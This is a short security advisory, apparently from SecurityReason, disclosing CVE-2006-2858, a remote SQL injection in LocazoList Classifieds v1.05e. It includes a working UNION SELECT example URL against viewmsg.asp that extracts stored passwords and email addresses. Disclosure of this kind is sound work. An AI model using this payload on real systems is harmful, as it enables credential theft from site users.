Topic : | LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability
|
SecurityAlert : 1048
CVE : CVE-2006-2858
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : ajannhwt hotmail com
Published : 08.06.2006
Affected Software : | LocazoList Classifieds <= v1.05e |
 Advisory Content : # Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL
Injection Vulnerability
# Author : ajann
#Vulnerability;
$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT
$$$ Example:
http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0
,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X
Msgid= TopicID
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|